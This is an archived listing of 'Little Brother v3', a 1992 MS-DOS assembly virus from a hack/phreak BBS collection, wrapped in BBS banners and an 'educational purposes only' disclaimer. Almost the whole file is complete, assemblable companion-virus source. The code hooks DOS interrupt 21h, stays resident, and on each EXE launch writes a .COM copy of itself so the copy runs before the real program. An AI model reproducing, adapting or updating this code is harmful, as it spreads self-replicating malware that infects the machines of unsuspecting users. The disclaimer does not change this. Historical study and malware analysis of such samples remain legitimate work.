home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / BROTHER3.ASM < prev    next >
Assembly Source File  |  1992-10-11  |  12KB  |  309 lines

  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]                            [=-                     ;
  10. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  11. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  12. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  13. ;                                                                            ;
  14. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  15. ;                                                                            ;
  16. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  17. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  18. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  19. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  20. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  21. ; Is. Keep This Code in Responsible Hands!                                   ;
  22. ;                                                                            ;
  23. ;****************************************************************************;
  24. ;****************************************************************************
  25. ;*  Little Brother    version 3
  26. ;*
  27. ;*  Compile with MASM 4.0
  28. ;*  (other assemblers will probably not produce the same result)
  29. ;*
  30. ;*  Disclaimer:
  31. ;*  This file is only for educational purposes. The author takes no
  32. ;*  responsibility for anything anyone does with this file. Do not
  33. ;*  modify this file!
  34. ;****************************************************************************
  35.  
  36. cseg            segment
  37.                 assume  cs:cseg,ds:cseg,es:nothing
  38.  
  39.                 .RADIX  16
  40.  
  41. FILELEN         equ     end - begin
  42. oi21            equ     end
  43. nameptr         equ     end+4
  44.  
  45.  
  46. ;****************************************************************************
  47. ;*              Install the program!
  48. ;****************************************************************************
  49.  
  50.                 org     100h
  51.  
  52. begin:          cld
  53.                 mov     sp,300
  54.  
  55.                 mov     ax,0044h                ;move program to empty hole
  56.                 mov     es,ax
  57.                 mov     di,0100h
  58.                 mov     si,di
  59.                 mov     cx,FILELEN
  60.         rep     movsb
  61.  
  62.                 mov     ds,cx                   ;get original int21 vector
  63.                 mov     si,0084h
  64.                 mov     di,offset oi21
  65.                 mov     dx,offset ni21
  66.                 lodsw
  67.                 cmp     ax,dx                   ;already installed?
  68.                 je      cancel
  69.                 stosw
  70.                 movsw
  71.  
  72.                 push    es                      ;set vector to new handler
  73.                 pop     ds
  74.                 mov     ax,2521h
  75.                 int     21h
  76.  
  77. cancel:         push    cs                      ;restore segment registers
  78.                 pop     ds
  79.                 push    cs
  80.                 pop     es
  81.  
  82.                 mov     bx,30                   ;free memory
  83.                 mov     ah,4A
  84.                 int     21
  85.  
  86.                 mov     es,ds:[002C]            ;search filename in environment
  87.                 mov     di,0
  88.                 mov     ch,0FFh
  89.                 mov     al,01
  90.         repnz   scasb
  91.                 inc     di
  92.  
  93.                 mov     word ptr [nameptr],di
  94.                 mov     word ptr [nameptr+2],es
  95.                 
  96.                 mov     si,offset EXE_txt       ;change extension to .EXE
  97.                 call    change_ext
  98.  
  99.                 push    cs
  100.                 pop     es
  101.                 mov     bx,offset param         ;make EXEC param. block
  102.                 mov     [bx+4],cs
  103.                 mov     [bx+8],cs
  104.                 mov     [bx+0C],cs
  105.                 lds     dx,dword ptr [nameptr]
  106.                 mov     ax,4B00                 ;execute .EXE program
  107.                 int     21
  108.                 mov     ah,4Dh                  ;ask return code
  109.                 int     21
  110.                 mov     ah,4Ch                  ;exit with same return code
  111.                 int     21
  112.  
  113.  
  114. ;****************************************************************************
  115. ;*              EXEC parameter block
  116. ;****************************************************************************
  117.  
  118. param           dw      0, 80, ?, 5C, ?, 6C, ?
  119.  
  120.  
  121. ;****************************************************************************
  122. ;*              File-extensions
  123. ;****************************************************************************
  124.  
  125. EXE_txt         db      'EXE',0
  126. COM_txt         db      'COM',0
  127.  
  128.  
  129. ;****************************************************************************
  130. ;*              Interupt handler 24
  131. ;****************************************************************************
  132.  
  133. ni24:           mov     al,03
  134.                 iret
  135.  
  136.  
  137. ;****************************************************************************
  138. ;*              Interupt handler 21
  139. ;****************************************************************************
  140.  
  141. ni21:           pushf
  142.                 push    dx
  143.                 push    bx
  144.                 push    ax
  145.                 push    ds
  146.                 push    es
  147.  
  148.                 cmp     ax,4B00h                ;execute ?
  149.                 jne     exit
  150.  
  151. doit:           call    infect
  152.  
  153. exit:           pop     es
  154.                 pop     ds
  155.                 pop     ax
  156.                 pop     bx
  157.                 pop     dx
  158.                 popf
  159.  
  160.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler
  161.  
  162.  
  163. ;****************************************************************************
  164. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  165. ;****************************************************************************
  166.  
  167. infect:         cld
  168.  
  169.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  170.                 mov     word ptr cs:[nameptr+2],ds
  171.  
  172.                 push    cs
  173.                 pop     ds
  174.                 call    searchpoint
  175.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  176.                 mov     cx,3
  177.         rep     cmpsb
  178.                 jnz     return
  179.  
  180.                 mov     si,offset COM_txt       ;change extension to COM
  181.                 call    change_ext
  182.  
  183.                 mov     ax,3300h                ;get ctrl-break flag
  184.                 int     21
  185.                 push    dx
  186.  
  187.                 cwd                             ;clear the flag
  188.                 inc     ax
  189.                 push    ax
  190.                 int     21
  191.  
  192.                 mov     ax,3524h                ;get int24 vector
  193.                 int     21
  194.                 push    bx
  195.                 push    es
  196.  
  197.                 push    cs                      ;set int24 vec to new handler
  198.                 pop     ds
  199.                 mov     dx,offset ni24
  200.                 mov     ah,25h
  201.                 push    ax
  202.                 int     21
  203.  
  204.                 lds     dx,dword ptr [nameptr]  ;create the virus (unique name)
  205.                 xor     cx,cx
  206.                 mov     ah,5Bh
  207.                 int     21
  208.                 jc      return1                 
  209.                 xchg    bx,ax                   ;save handle
  210.  
  211.                 push    cs
  212.                 pop     ds
  213.                 mov     cx,FILELEN              ;write the virus
  214.                 mov     dx,offset begin
  215.                 mov     ah,40h
  216.                 int     21
  217.                 cmp     ax,cx
  218.                 pushf
  219.  
  220.                 mov     ah,3Eh                  ;close the file
  221.                 int     21
  222.  
  223.                 popf
  224.                 jz      return1                 ;all bytes written?
  225.  
  226.                 lds     dx,dword ptr [nameptr]  ;no, delete the virus
  227.                 mov     ah,41h
  228.                 int     21
  229.  
  230. return1:        pop     ax                      ;restore int24 vector
  231.                 pop     ds
  232.                 pop     dx
  233.                 int     21
  234.  
  235.                 pop     ax                      ;restore ctrl-break flag
  236.                 pop     dx
  237.                 int     21
  238.  
  239.                 mov     si,offset EXE_txt       ;change extension to EXE
  240.                 call    change_ext              ;execute .EXE program
  241.  
  242. return:         ret
  243.  
  244.  
  245. ;****************************************************************************
  246. ;*              change the extension of the filename (CS:SI -> ext)
  247. ;****************************************************************************
  248.  
  249. change_ext:     call    searchpoint
  250.                 push    cs
  251.                 pop     ds
  252.                 movsw
  253.                 movsw
  254.                 ret
  255.  
  256.  
  257. ;****************************************************************************
  258. ;*              search begin of extension  
  259. ;****************************************************************************
  260.  
  261. searchpoint:    les     di,dword ptr cs:[nameptr]
  262.                 mov     ch,0FFh
  263.                 mov     al,0
  264.         repnz   scasb
  265.                 sub     di,4
  266.                 ret
  267.  
  268.  
  269. ;****************************************************************************
  270. ;*              Text and Signature
  271. ;****************************************************************************
  272.  
  273.                 db      'Little Brother',0
  274.  
  275. end:
  276.  
  277. cseg            ends
  278.                 end     begin
  279.  
  280. ;****************************************************************************;
  281. ;                                                                            ;
  282. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  283. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  284. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  285. ;                     -=]                            [=-                     ;
  286. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  287. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  288. ;                     -=]                            [=-                     ;
  289. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  290. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  291. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  292. ;                                                                            ;
  293. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  294. ;                                                                            ;
  295. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  296. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  297. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  298. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  299. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  300. ; Is. Keep This Code in Responsible Hands!                                   ;
  301. ;                                                                            ;
  302. ;****************************************************************************;
  303.  
  304. ;─────────────────────────────────────────────────────────────────────────;
  305. ;──────────────────> and Remember Don't Forget to Call <──────────────────;
  306. ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
  307. ;─────────────────────────────────────────────────────────────────────────;
  308.  
  309.